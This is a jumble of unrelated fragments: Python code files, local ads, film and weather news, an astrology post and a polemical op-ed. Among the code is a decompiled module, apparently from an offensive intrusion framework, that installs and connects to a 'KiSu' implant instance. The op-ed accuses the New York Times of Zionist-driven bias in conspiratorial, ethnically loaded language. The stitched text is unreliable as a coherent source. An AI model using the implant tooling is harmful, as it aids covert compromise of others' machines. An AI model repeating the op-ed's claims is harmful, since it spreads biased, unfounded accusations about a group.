namelist may contain multiple keys for different values.
This object returns a list of namelist groups which use the same key.
Internal keys correspond to the original ordering in the namelist.
When an element of the list is updated, the corresponding namelist element
is also updated.
"""
def __init__(self, nml, key, *args, **kwds):
"""Generate list of Namelist cogroups linked to parent namelist."""
self.nml = nml
self.key = key
grps = [OrderedDict.__getitem__(self.nml, k) for k in self.keys]
super(Cogroup, self).__init__(grps, **kwds)
def __setitem__(self, index, value):
"""Update cogroup list and parent namelist."""
key = self.keys[index]
OrderedDict.__setitem__(self.nml, key, value)
def __delitem__(self, index):
gkey = self.keys[index]
OrderedDict.__delitem__(self.nml, gkey)
super(Cogroup, self).__delitem__(index)
# Remove the cogroup status if keys are depleted
if len(self) == 0:
self.nml._cogroups.remove(self.key)
@property
def keys(self):
"""Return the namelist keys in the cogroup."""
cogrp_keys = [
k for k in self.nml
if k.startswith('_grp_{}'.format(self.key))
or k == self.key
]
return cogrp_keys
def is_nullable_list(val, vtype):
"""Return True if list contains either values of type `vtype` or None."""
return (isinstance(val, list) and
any(isinstance(v, vtype) for v in val) and
all((isinstance(v, vtype) or v is None) for v in val))
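

# ----------------------------------------------------------------------
# Usage sketch (illustrative only; the group and variable names below are
# hypothetical, not part of the library):
#
#     >>> nml = Namelist({'config_nml': {'x': [1, 2, 2, 2], 'flag': True}})
#     >>> nml.repeat_counter = True
#     >>> nml.uppercase = True
#     >>> print(nml)
#     &CONFIG_NML
#         FLAG = .true.
#         X = 1, 3*2
#     /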
|
Their classes are sized so each child can get attention, and the staff cares for each child with their needs and safety coming first. Activities are scheduled to suit each age group. Their rates are very reasonable, and meals and snacks are offered.
# Copyright 2016 Antonio Espinosa
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
from odoo import _, api, models
from odoo.exceptions import ValidationError
class ResPartner(models.Model):
_inherit = "res.partner"
@api.multi
@api.constrains('ref', 'is_company', 'company_id')
def _check_ref(self):
for partner in self:
mode = partner.company_id.partner_ref_unique
if (partner.ref and (
mode == 'all' or
(mode == 'companies' and partner.is_company))):
domain = [
('id', '!=', partner.id),
('ref', '=', partner.ref),
]
if mode == 'companies':
domain.append(('is_company', '=', True))
other = self.search(domain)
# active_test is False when called from
# base.partner.merge.automatic.wizard
if other and self.env.context.get("active_test", True):
                    raise ValidationError(
                        _("This reference is already assigned to partner "
                          "'%s'") % other[0].display_name)
|
There is confusion laced with fear in the mind of every publisher in the world. This is especially true of the old titans of the print media who view the Internet with a mixture of lust and suspicion. Until just a few years ago, a print media empire like the New York Times Company was unassailable by virtue of its size. They could drown out any competitive voice by sheer volume of circulation. Even a market as large as New York City could be virtually monopolized by three daily papers, the New York Times, the ever plebeian Daily News and Murdoch’s tabloid, the New York Post. Most other American cities have markets dominated by a single paper.
Before Gore invented the Internet, the print media was a tidy little business dominated by a few publishers who made fortunes that made them kingmakers. William Randolph Hearst was a publisher arrogant enough to start the Spanish-American War through his infamous campaign of yellow journalism.
In a similar fashion, The New York Times Company has a management and editorial staff that have arrogated the power to make and change America’s policy in the Middle East. This is especially true when it comes to the Israeli/Palestinian conflict. The Machiavellian princes at the Times will not shy from publicly tormenting any American politician who dares have a view that clashes with Israeli ‘wisdom’. Their power has been such that America now has a Middle Eastern foreign policy that is based on Zionist historic mythology. It is also a policy that caters to Israel’s every ambition.
These old school media titans plan to hold onto their market share and will not easily shed their power to sway public policy. Thinking themselves invincible, they are making a play for dominating advocacy journalism on the Web. They bring to this virtually impossible task the heavy artillery of their historical record. One could not design a more lethal two-edged sword.
Imagine the challenges they face on the views and news they have printed on the Israeli/Palestinian conflict over the last fifty years. The ‘vaunted’ content they wish to leverage on this particular subject is very tainted material. I predict that the credibility of this news organization will be damaged by a technology that gives a new generation of cyber journalists immediate access to archives that can easily be impeached by those who have not swallowed whole the encyclopedia of Zionist mythology.
New lessons are quickly being assimilated by nimble dot.com competitors who do not carry the baggage of archives. The burden of these tainted archives will be the Achilles heel of the ‘established’ print media. The rules of the game in advocacy journalism are changing faster than a click of the mouse. Consider that every article a journalist or an editor pens today becomes a permanent record. Every legitimate response also gains an eternal shelf life. If a journalist twists his news or his facts, the evidence of tampering will not get lost in the recycling bin. It can be accumulated on a tiny disk. Indeed, the titans at the Times have not only to worry about the news they print today; they need to worry about an archive that goes back 50 years and speaks volumes about the nature and extent of shameless pro-Israeli advocacy.
The New York Times tradition of tainting the news on the Israeli/Palestinian conflict is one that predates the founding of the Jewish State. In New York, Israel is a local issue. That is why this particular municipal paper devotes so much space to the subject. And that is just one subject they need to fret about. It would be hard to believe that the complaints about the content of their archives will emanate only from those of us who know Palestinian history. Their role in the attempted theft of the presidential election has no doubt created serious concerns in serious quarters.
LATE IN SEPTEMBER, the Palestinian Authority kicked off a campaign of organized violence meant to hasten the final “liberation” of Israel from the Jews. The fighting began with mobs throwing rocks and firebombs at Jewish civilians and vehicles. Soon it escalated to militiamen firing automatic weapons at Israeli troops – often from behind Arab teenagers used as human shields.
There have been scenes of shocking barbarity. On the eve of Rosh Hashana, a Muslim throng on the Temple Mount plaza hurled stones and bricks on worshippers at the Western Wall below. In Nablus, Arabs demolished Joseph’s Tomb, torching and smashing the ancient shrine in a frenzy of desecration. On Oct. 11, gunmen opened fire on mourners carrying Rabbi Hillel Lieberman to his grave; the rabbi had been killed trying to save the Torah scroll at Joseph’s Tomb. When three Israeli reservists took a wrong turn into Ramallah, two of them were lynched, their corpses mutilated beyond recognition, thrown from a window, and dragged through the streets. The third, it was reported, was burned in his car.
As if that is not enough inciteful and hysterical hate-mongering, this moron of a bigot goes on to state that Palestinians are letting their kids become ‘martyrs’ in exchange for cash from the Palestinian Authority. This particular bit of slander, maligning and defaming the fallen Palestinians and their mothers, has appeared once too often in Sulzberger’s publications. It cannot be written off as the work of a deranged solitary journalist.
No kind of apology will ever suffice for this kind of vindictive graffiti that pollutes many a page published by the New York Times Company. It is one thing for the Times to be a belligerent in the Palestinian/Israeli conflict and quite another to practice the arson of defamation. The Palestinians have no refuge from the Times, but Arab-Americans and the Muslims of America will long remember the vilification and manufactured disdain that have become a nauseating by-product of pro-Israeli advocacy at The New York Times. The arsenal buried in the archives of Mr Sulzberger’s publications inflicted many a wound to our collective memory.
Jacoby’s article completely ignored the almost 200 Palestinians who had been killed by the IDF at the time the article was published. Also unmentioned by Jacoby are the thousands of Palestinians who were maimed and mutilated by the unrestrained force being applied by the IDF. Nothing is said about the extent of property damage inflicted on Palestinians and the desecration of their mosques and churches. Jacoby’s racist drivel can always be found in the archives of the New York Times Publishing Company (Boston Globe Division).
What was even more outrageous about this particular ‘Boston Globe / New York Times’ Jacoby article was that it came in response to a full-page advertisement by the American-Arab-Anti-Discrimination Committee in the New York Times. Yet there is no mention in Jacoby’s article that his paycheck is written by the New York Times Publishing Company. Sulzberger and his company have no qualms about selling space to an Arab-American civil rights organization in one of his publications and turning around and allowing The Boston Globe’s Jacoby to slander every Palestinian victim, every Palestinian victim’s family, every Arab, every Arab-American and every Muslim-American. Sulzberger is not beyond selling an Ad to a baker and then spreading ruinous rumors about his dough.
All this is nothing new for Sulzberger and his minions in New York and Boston.
They have long considered it fair game to malign fellow Americans of Arab descent. We are just considered a side casualty of the Israel Firsters’ attempt to demonize the Palestinians. Well, let them write what they want. We just need them to remember to leave a copy in the archives.
It is said of lawyers that 99% of them give the other one percent a bad name. I don’t know what the exact figures are for New York Times journalists. But the archives paint a pretty dismal picture. Every journalist at the Times and the Globe writes in the company of other journalists who get paid by Sulzberger. Jacoby, Sontag, Safire, Friedman and Bob Herbert toil at the same place as Anthony Lewis. Can it be that Lewis was blind to the suspect journalism of his colleagues? Does Jacoby’s attitude extend to those who do the hiring and firing at the New York Times? How diverse is the staff at this print media empire, anyhow? These are times of nothing but worries at the New York Times. Infested archives are the dry rot that will reduce Sulzberger’s print empire back to being just another ethnic provincial paper. The internet is not good news for the print media titans.
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: __init__.py
import demi.windows
import demi.registry
import dsz.cmd
import dsz.env
import dsz.ui
import re
ConnectedEnv = '_DEMI_KISU_COMMS_ESTABLISHED'
KiSuEnabledEnv = '_DEMI_KISU_ENABLED'
def IsConnected():
    return ConnectedId() is not None


def ConnectedId():
    try:
        curId = int(dsz.env.Get(ConnectedEnv), 16)
    except Exception:
        return None
    if curId == 0:
        return None
    return curId
def UseKiSu():
if not IsConnected():
return False
try:
state = dsz.env.Get(KiSuEnabledEnv)
if state.lower() in ('true', 'enabled', 'on', '1', 'go', 'use'):
return True
    except Exception:
        pass
return False
def EnableKiSu():
dsz.env.Set(KiSuEnabledEnv, 'on')
return True
def DisableKiSu():
dsz.env.Set(KiSuEnabledEnv, 'off')
return True
def IsKisuAvailable(instance=None, type=None):
return dsz.cmd.Run('available -command kisu_install')
def InstallKiSu(instance=None, type=None):
dsz.ui.Echo('entered')
instanceId = '-type PC'
if instance != None:
instanceId = '-instance 0x%08x' % instance
if type != None:
instanceId = '-type %s' % type
return dsz.cmd.Run('kisu_install %s' % instanceId)
def ConnectKiSu(instance=None, type=None):
instanceId = '-type PC'
if instance != None:
instanceId = '-instance %s' % instance
if type != None:
instanceId = '-type %s' % type
return dsz.cmd.Run('kisu_connect %s' % instanceId)
def DisconnectKiSu():
return dsz.cmd.Run('kisu_disconnect')
def EnsureConnected(ask=True):
if demi.IsConnected():
return True
if not ask:
dsz.ui.Echo('* Not currently connected to a KISU instance', dsz.ERROR)
return False
dsz.ui.Echo('* Not currently connected to a KISU instance', dsz.WARNING)
    try:
        target = dsz.ui.GetString('What KISU would you like to connect to?', 'pc')
    except Exception:
        return False
    key = '-type'
    try:
        # Numeric or hex input names an instance ID rather than a KISU type
        if re.match('^(([0-9]+)|(0[xX][0-9a-fA-F]{1,8}))$', target):
            key = '-instance'
    except Exception:
        pass
    dsz.ui.Echo('Loading KISU tool')
    if not dsz.cmd.Run('available -command kisu_connect -load'):
        dsz.ui.Echo(' FAILED', dsz.ERROR)
        dsz.ui.Echo('* Unable to load KISU tool', dsz.ERROR)
        return False
    dsz.ui.Echo(' SUCCESS', dsz.GOOD)
    dsz.ui.Echo('Attempting to connect to KISU %s' % target)
    if not dsz.cmd.Run('kisu_connect %s %s' % (key, target)):
        dsz.ui.Echo(' FAILED', dsz.ERROR)
        dsz.ui.Echo('* Unable to connect to a KISU instance', dsz.ERROR)
        return False
    dsz.ui.Echo(' SUCCESS', dsz.GOOD)
    return True
def TranslateIdToName(id):
Unknown = 'Unknown'
    if id is None:
return Unknown
else:
try:
import demi.mcf.kisu.ids
for name in demi.mcf.kisu.ids.nameTable:
if demi.mcf.kisu.ids.nameTable[name] == id:
return name
        except Exception:
            pass
return Unknown
def TranslateNameToId(Name):
Unknown = 0
    if Name is None:
return Unknown
else:
try:
import demi.mcf.kisu.ids
for kisuName in demi.mcf.kisu.ids.nameTable:
if kisuName.lower() == Name.lower():
return demi.mcf.kisu.ids.nameTable[kisuName]
        except Exception:
            pass
return Unknown |
Writer and director William McGregor’s debut feature Gwen is to premiere at the Toronto International Film Festival 2018, showing in the festival’s Discovery section. Eleanor Worthington-Cox, who plays the title role, has been picked as a TIFF 18 Rising Star.
Set in 19th-century Wales, the gothic drama Gwen follows the story of a young girl trying to keep her family together in the face of her mother’s mysterious illness, her father’s absence and a ruthless mining company encroaching on their land.
Gwen also stars Maxine Peake, Richard Harrington, Kobna Holdbrook-Smith, Mark Lewis Jones and newcomer Jodie Innes.
The feature was developed by the BFI and Endor Productions with Hilary Bevan Jones and Tom Nash as lead producers. The BFI’s Lizzie Francke, Paul Grindey and Charles Moore of Viewfinder Films, Fergus Haycock of Great Point Media and Adam Partridge of Ffilm Cymru Wales are executive producers. The production was co-financed by the BFI and Ffilm Cymru Wales. |
# Consider if this is the correct location for this element
def test_valid_coord(coord):
"""
Fill in
"""
assert type(coord) is tuple, "{} is not a tuple (coord)".format(coord)
assert type(coord[0]) is int, "{} is not an int (coord 0)".format(coord[0])
assert type(coord[1]) is int, "{} is not an int (coord 1)".format(coord[1])
    assert coord[0] > -1, "{} must be nonnegative (coord 0)".format(coord[0])
    assert coord[1] > -1, "{} must be nonnegative (coord 1)".format(coord[1])
return True
# This can probably be consolidated into an error class
def coord_range(coord0, coord1):
"""
    Returns a list of coordinates for a table (by row) between two coordinate points of the form (0, 0), where the first coordinate value is less than or equal to the second in both axes
@parameter - coord0, type = tuple
@parameter - coord1, type = tuple
@return, type = list of tuples or error
@dependencies, test_valid_coord (lf) which returns true or raises an assertion error
"""
    # _Testing
    # test_valid_coord raises an AssertionError on invalid input,
    # so no branching is needed here.
    test_valid_coord(coord0)
    test_valid_coord(coord1)
# _Main
ret_list = []
if coord0[0] <= coord1[0] and coord0[1] <= coord1[1]:
init0 = coord0[0]
init1 = coord0[1]
while init0 < coord1[0] + 1:
while init1 < coord1[1] + 1:
ret_list.append((init0,init1))
init1 += 1
init0 += 1
init1 = coord0[1]
else:
raise TypeError("Specify a valid start and end coordinate")
return ret_list
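

# Usage sketch (illustrative):
#
#     >>> coord_range((0, 0), (1, 2))
#     [(0, 0), (0, 1), (0, 2), (1, 0), (1, 1), (1, 2)]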
|
My sister often says to me: reach for the better feeling.
I am trying now to bring you a message of hope – that when things seem/feel most bleak, to keep reaching for the better feeling even if your practice does include the dark sunglasses of wallow and dirge.
And to eat nourishing food.
(Visit my latest Beliefnet post on the DEATH CARD for a Part One of sorts).
Mercury Mars in Taurus trine Pluto: YOU DO NOT QUIT.
Venus Jupiter sextile in happy signs, a blessing of abundance and good cheer.
I’ve heard of a few lucky breaks today — but what happens when… what happens when you are living the Death card but no Temperance, no Star in sight?
You are fierce, dressed in black, feathered, your eye knows the way. You are not alone. Not now, not here, not ever. Your very cry is an invocation. Your very cry is the way there. Keep going.
The Stars Today: Mercury Enters Virgo! |
"""
Created on 16 Nov 2018
@author: Bruno Beloff ([email protected])
"""
from collections import OrderedDict
from scs_core.data.json import JSONable
# --------------------------------------------------------------------------------------------------------------------
class OPCStatus(JSONable):
"""
    Status flags reported by an optical particle counter (OPC).
"""
CHARS = 6
# ----------------------------------------------------------------------------------------------------------------
@classmethod
def construct(cls, chars):
if len(chars) != cls.CHARS:
raise ValueError(chars)
fan_on = chars[0]
laser_dac_on = chars[1]
fan_dac_value = chars[2]
laser_dac_value = chars[3]
laser_switch = chars[4]
gain_toggle = chars[5]
return OPCStatus(fan_on, laser_dac_on, fan_dac_value, laser_dac_value, laser_switch, gain_toggle)
# ----------------------------------------------------------------------------------------------------------------
def __init__(self, fan_on, laser_dac_on, fan_dac_value, laser_dac_value, laser_switch, gain_toggle):
"""
Constructor
"""
self.__fan_on = int(fan_on)
self.__laser_dac_on = int(laser_dac_on)
self.__fan_dac_value = int(fan_dac_value)
self.__laser_dac_value = int(laser_dac_value)
self.__laser_switch = int(laser_switch)
self.__gain_toggle = int(gain_toggle)
# ----------------------------------------------------------------------------------------------------------------
def fan_is_on(self):
return self.fan_on & 0x01
def laser_is_on(self):
return self.laser_switch & 0x01
# ----------------------------------------------------------------------------------------------------------------
def as_json(self):
jdict = OrderedDict()
jdict['fan-on'] = self.fan_on
jdict['laser-dac-on'] = self.laser_dac_on
jdict['fan-dac-value'] = self.fan_dac_value
jdict['laser-dac-value'] = self.laser_dac_value
jdict['laser-switch'] = self.laser_switch
jdict['gain-toggle'] = self.gain_toggle
return jdict
# ----------------------------------------------------------------------------------------------------------------
@property
def fan_on(self):
return self.__fan_on
@property
def laser_dac_on(self):
return self.__laser_dac_on
@property
def fan_dac_value(self):
return self.__fan_dac_value
@property
def laser_dac_value(self):
return self.__laser_dac_value
@property
def laser_switch(self):
return self.__laser_switch
@property
def gain_toggle(self):
return self.__gain_toggle
# ----------------------------------------------------------------------------------------------------------------
def __str__(self, *args, **kwargs):
return "OPCStatus:{fan_on:0x%02x, laser_dac_on:0x%02x, fan_dac_value:0x%02x, laser_dac_value:0x%02x, " \
"laser_switch:0x%02x, gain_toggle:0x%02x}" % \
(self.fan_on, self.laser_dac_on, self.fan_dac_value, self.laser_dac_value,
self.laser_switch, self.gain_toggle)
|
BBC Midlands Today anchorman, presenter and chat show host Nick Owen says he loves the Rex Cinema in Berkhamsted, Herts.
“The Rex Cinema in Berkhamsted, Herts., was the scene of my first kiss,” Nick Owen reveals. “I was sitting in the back row watching the Elvis Presley film Kid Galahad with my first girlfriend Philippa. She was 5’5” and I was 5’3” but, even then, size didn’t matter!
I slowly plucked up the courage to put my arm around her shoulder. Then I went inexorably to that first, momentous and historic kiss. It was like being plugged into an electric socket! What a buzz, one that I’ll never forget.”
The cinema itself was an interesting Art Deco building. So unusual was it that it’s been the subject of a long-running battle to save it. It has now been preserved as a cinema, amongst other things, and was recently described as ‘possibly the most beautiful cinema in the land’. For me as a youngster, it was just about the only place for entertainment in my small hometown, within walking distance of home and, to this day, it remains jam-packed with wonderful memories.
The Rex Cinema in Berkhamsted, Herts. |
# Copyright 2014-2015 Predikto, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
class RequestError(Exception):
def __init__(self, response, content=None, message=None):
self.response = response
self.content = content
self.message = message
def __str__(self):
message = "ERROR!"
if hasattr(self.response, 'status_code'):
message += " HTTP Status: %s." % (self.response.status_code)
if hasattr(self.response, 'message'):
message += " Message: %s." % (self.response.message)
if self.content is not None:
message += " Error: " + str(self.content)
return message
class MissingConfig(Exception):
pass
class ClientError(RequestError):
"""
Base
"""
pass
class InvalidResource(ClientError):
"""
400
"""
pass
class Unauthorized(ClientError):
"""
401
"""
pass
class Forbidden(ClientError):
"""
403
"""
pass
class ResourceNotFound(ClientError):
"""
404
"""
pass
class EntityTooLarge(ClientError):
"""
413
"""
pass
class ServerError(RequestError):
"""
500
"""
pass
class MethodNotAllowed(ClientError):
"""
405
"""
def allowed_methods(self):
return self.response['Allow']
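

# Usage sketch (illustrative; this dispatch helper is an assumption about
# how these classes are meant to be used, not part of the module's API):
STATUS_EXCEPTIONS = {
    400: InvalidResource,
    401: Unauthorized,
    403: Forbidden,
    404: ResourceNotFound,
    405: MethodNotAllowed,
    413: EntityTooLarge,
    500: ServerError,
}


def raise_for_response(response, content=None):
    """Raise the RequestError subclass mapped to the response status code."""
    exc_class = STATUS_EXCEPTIONS.get(getattr(response, 'status_code', None))
    if exc_class is not None:
        raise exc_class(response, content)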
|
One part of Indonesia’s cultural heritage is its craft art, which is scattered throughout the islands of Indonesia from Sabang to Merauke. There are more than 300 tribes, diverse in their local languages, customs, arts, traditional houses, and craft products.
Indonesian craft forms were influenced by elements of animism and dynamism. These old beliefs were later blended with the culture brought by traders from India, China, and Persia, and were also influenced by the arrival of the Europeans, who travelled in search of the herbs that grow in Indonesia. These traders settled and brought their traditions, arts, and culture, which became acculturated with local cultures and influenced the development of local art.
Many crafts have now developed in Indonesia, such as woodworking, silver, batik, weaving, bamboo, metal, leather, wicker, rattan, pottery and ceramics, glass, painting, and traditional houses.
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import multiprocessing
import os
import signal
import time
import unittest
from datetime import datetime
import psutil
import six
from airflow import DAG
from airflow.utils import helpers
from airflow.models import TaskInstance
from airflow.operators.dummy_operator import DummyOperator
class TestHelpers(unittest.TestCase):
@staticmethod
def _ignores_sigterm(child_pid, child_setup_done):
def signal_handler(signum, frame):
pass
signal.signal(signal.SIGTERM, signal_handler)
child_pid.value = os.getpid()
child_setup_done.release()
while True:
time.sleep(1)
@staticmethod
def _parent_of_ignores_sigterm(parent_pid, child_pid, setup_done):
def signal_handler(signum, frame):
pass
os.setsid()
signal.signal(signal.SIGTERM, signal_handler)
child_setup_done = multiprocessing.Semaphore(0)
child = multiprocessing.Process(target=TestHelpers._ignores_sigterm,
args=[child_pid, child_setup_done])
child.start()
child_setup_done.acquire(timeout=5.0)
parent_pid.value = os.getpid()
setup_done.release()
while True:
time.sleep(1)
def test_render_log_filename(self):
try_number = 1
dag_id = 'test_render_log_filename_dag'
task_id = 'test_render_log_filename_task'
execution_date = datetime(2016, 1, 1)
dag = DAG(dag_id, start_date=execution_date)
task = DummyOperator(task_id=task_id, dag=dag)
ti = TaskInstance(task=task, execution_date=execution_date)
filename_template = "{{ ti.dag_id }}/{{ ti.task_id }}/{{ ts }}/{{ try_number }}.log"
ts = ti.get_template_context()['ts']
expected_filename = "{dag_id}/{task_id}/{ts}/{try_number}.log".format(dag_id=dag_id,
task_id=task_id,
ts=ts,
try_number=try_number)
rendered_filename = helpers.render_log_filename(ti, try_number, filename_template)
self.assertEqual(rendered_filename, expected_filename)
def test_reap_process_group(self):
"""
Spin up a process that can't be killed by SIGTERM and make sure
it gets killed anyway.
"""
parent_setup_done = multiprocessing.Semaphore(0)
parent_pid = multiprocessing.Value('i', 0)
child_pid = multiprocessing.Value('i', 0)
args = [parent_pid, child_pid, parent_setup_done]
parent = multiprocessing.Process(target=TestHelpers._parent_of_ignores_sigterm,
args=args)
try:
parent.start()
self.assertTrue(parent_setup_done.acquire(timeout=5.0))
self.assertTrue(psutil.pid_exists(parent_pid.value))
self.assertTrue(psutil.pid_exists(child_pid.value))
helpers.reap_process_group(parent_pid.value, logging.getLogger(),
timeout=1)
self.assertFalse(psutil.pid_exists(parent_pid.value))
self.assertFalse(psutil.pid_exists(child_pid.value))
finally:
try:
                os.kill(parent_pid.value, signal.SIGKILL)  # terminate doesn't work here
                os.kill(child_pid.value, signal.SIGKILL)  # terminate doesn't work here
except OSError:
pass
def test_chunks(self):
with self.assertRaises(ValueError):
[i for i in helpers.chunks([1, 2, 3], 0)]
with self.assertRaises(ValueError):
[i for i in helpers.chunks([1, 2, 3], -3)]
self.assertEqual([i for i in helpers.chunks([], 5)], [])
self.assertEqual([i for i in helpers.chunks([1], 1)], [[1]])
self.assertEqual([i for i in helpers.chunks([1, 2, 3], 2)],
[[1, 2], [3]])
def test_reduce_in_chunks(self):
self.assertEqual(helpers.reduce_in_chunks(lambda x, y: x + [y],
[1, 2, 3, 4, 5],
[]),
[[1, 2, 3, 4, 5]])
self.assertEqual(helpers.reduce_in_chunks(lambda x, y: x + [y],
[1, 2, 3, 4, 5],
[],
2),
[[1, 2], [3, 4], [5]])
self.assertEqual(helpers.reduce_in_chunks(lambda x, y: x + y[0] * y[1],
[1, 2, 3, 4],
0,
2),
14)
def test_is_in(self):
obj = ["list", "object"]
# Check for existence of a list object within a list
self.assertTrue(
helpers.is_in(obj, [obj])
)
# Check that an empty list returns false
self.assertFalse(
helpers.is_in(obj, [])
)
# Check to ensure it handles None types
self.assertFalse(
helpers.is_in(None, [obj])
)
# Check to ensure true will be returned of multiple objects exist
self.assertTrue(
helpers.is_in(obj, [obj, obj])
)
def test_is_container(self):
self.assertFalse(helpers.is_container("a string is not a container"))
self.assertTrue(helpers.is_container(["a", "list", "is", "a", "container"]))
def test_as_tuple(self):
self.assertEqual(
helpers.as_tuple("a string is not a container"),
("a string is not a container",)
)
self.assertEqual(
helpers.as_tuple(["a", "list", "is", "a", "container"]),
("a", "list", "is", "a", "container")
)
class HelpersTest(unittest.TestCase):
def test_as_tuple_iter(self):
test_list = ['test_str']
as_tup = helpers.as_tuple(test_list)
self.assertTupleEqual(tuple(test_list), as_tup)
def test_as_tuple_no_iter(self):
test_str = 'test_str'
as_tup = helpers.as_tuple(test_str)
self.assertTupleEqual((test_str,), as_tup)
def test_is_in(self):
from airflow.utils import helpers
# `is_in` expects an object, and a list as input
test_dict = {'test': 1}
test_list = ['test', 1, dict()]
small_i = 3
big_i = 2 ** 31
test_str = 'test_str'
test_tup = ('test', 'tuple')
test_container = [test_dict, test_list, small_i, big_i, test_str, test_tup]
# Test that integers are referenced as the same object
self.assertTrue(helpers.is_in(small_i, test_container))
self.assertTrue(helpers.is_in(3, test_container))
        # Python caches small integers, so `small_i is 3` will be True,
        # but `big_i is 2 ** 31` is False.
self.assertTrue(helpers.is_in(big_i, test_container))
self.assertFalse(helpers.is_in(2 ** 31, test_container))
self.assertTrue(helpers.is_in(test_dict, test_container))
self.assertFalse(helpers.is_in({'test': 1}, test_container))
self.assertTrue(helpers.is_in(test_list, test_container))
self.assertFalse(helpers.is_in(['test', 1, dict()], test_container))
self.assertTrue(helpers.is_in(test_str, test_container))
self.assertTrue(helpers.is_in('test_str', test_container))
bad_str = 'test_'
bad_str += 'str'
self.assertFalse(helpers.is_in(bad_str, test_container))
self.assertTrue(helpers.is_in(test_tup, test_container))
self.assertFalse(helpers.is_in(('test', 'tuple'), test_container))
bad_tup = ('test', 'tuple', 'hello')
self.assertFalse(helpers.is_in(bad_tup[:2], test_container))
def test_is_container(self):
self.assertTrue(helpers.is_container(['test_list']))
self.assertFalse(helpers.is_container('test_str_not_iterable'))
# Pass an object that is not iter nor a string.
self.assertFalse(helpers.is_container(10))
def test_cross_downstream(self):
"""Test if all dependencies between tasks are all set correctly."""
dag = DAG(dag_id="test_dag", start_date=datetime.now())
start_tasks = [DummyOperator(task_id="t{i}".format(i=i), dag=dag) for i in range(1, 4)]
end_tasks = [DummyOperator(task_id="t{i}".format(i=i), dag=dag) for i in range(4, 7)]
helpers.cross_downstream(from_tasks=start_tasks, to_tasks=end_tasks)
for start_task in start_tasks:
six.assertCountEqual(self, start_task.get_direct_relatives(upstream=False), end_tasks)
if __name__ == '__main__':
unittest.main()
|
Refer a friend to Rhett Women’s Center Aesthetics and receive a $25 gift certificate towards a service of your choosing.
Sign up for our Brilliant Distinctions rewards program to save up to $200 on CoolSculpting treatments.
Now offering Dual CoolSculpting. Get the same non-invasive, fat-freezing results in half the time by treating stubborn fat simultaneously, giving you faster, more flexible CoolSculpting treatments.
### Taken from https://pypi.python.org/pypi/paho-mqtt
### Requires Paho-MQTT package, install by:
### pip install paho-mqtt
import paho.mqtt.client as mqtt
MQTT_URL = ""
MQTT_USERID = ""
MQTT_PASSWD = ""
MQTT_TOPIC_EVENT = ''
MQTT_TOPIC_PUB = ''
MQTT_PUB_STRING = ''
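# The callback for when the client receives a CONNACK response from the server.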
def on_connect(client, userdata, flags, rc):
print("Connected with result code " + str(rc))
if MQTT_TOPIC_EVENT:
client.subscribe(MQTT_TOPIC_EVENT)
print("Subscribed to " + MQTT_TOPIC_EVENT)
if MQTT_PUB_STRING:
client.publish(MQTT_TOPIC_PUB, MQTT_PUB_STRING, 0)
print("Published " + MQTT_PUB_STRING + " to " + MQTT_TOPIC_PUB)
# The callback for when a PUBLISH message is received from the server.
def on_message(client, userdata, msg):
print(msg.topic + " " + str(msg.payload))
client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message
print("connecting to " + MQTT_URL)
client.username_pw_set(MQTT_USERID, MQTT_PASSWD)
client.connect(MQTT_URL, 1883, 60)
client.loop_forever()
|
Bright and sunny weather is expected, and it will stay dry throughout the day. It is getting warmer: the temperature rises from 16 degrees on Sunday to 22 degrees on Tuesday. On Sunday there will be a fresh wind from the northwest.
# -*- coding: utf-8 -*-
"""
Time handling module: unified handling of time-related functions.
@author: AZLisme
@email: [email protected]
"""
from datetime import datetime, timedelta
import pytz
import time
_DEFAULT_TIMEZONE = pytz.utc
def now(tz=None):
"""获取现在的日期对象(带时区)"""
if tz is None:
return datetime.now(tz=_DEFAULT_TIMEZONE)
else:
return datetime.now(tz=tz)
def get_timezone(tz_name: str):
"""获取时区对象,封装pytz
:param tz_name: 时区名字,常用的有'UTC', 'Asia/Shanghai'
:return:
"""
return pytz.timezone(tz_name)
def get_default_timezone():
"""获取默认时间戳
:return:
"""
return _DEFAULT_TIMEZONE
def set_default_timezone(tz_name: str) -> None:
"""设置默认的时区
:param Union(str, unicode) tz_name: 时区名字, 例如 'UTC', 'Asia/Shanghai'
:return: None
"""
global _DEFAULT_TIMEZONE
_DEFAULT_TIMEZONE = pytz.timezone(tz_name)
def timestamp(dt: datetime = None) -> float:
"""获取时间戳, 如果参数为None则返回当前时间戳
:param dt: 要转化为时间戳的时间,如果为None则返回当前时间戳。
:return float: 时间戳
"""
if dt is None:
return time.time()
else:
if dt.tzinfo is None:
dt = _DEFAULT_TIMEZONE.localize(dt)
utc_dt = dt.astimezone(pytz.utc)
        delta = utc_dt - datetime(1970, 1, 1, 0, 0, 0, 0, pytz.utc)
return delta.total_seconds()
def datetime_from_timestamp(ts: float) -> datetime:
""" 从时间戳获取日期对象
:param ts: 时间戳
:return: 日期对象
"""
    dt = datetime(1970, 1, 1, 0, 0, 0, 0, pytz.utc) + timedelta(seconds=ts)
return dt.astimezone(_DEFAULT_TIMEZONE)
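

# Usage sketch (illustrative):
#
#     >>> set_default_timezone('Asia/Shanghai')
#     >>> ts = timestamp(datetime(2018, 1, 1))  # naive input is localized to the default timezone
#     >>> datetime_from_timestamp(ts).isoformat()
#     '2018-01-01T00:00:00+08:00'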
|
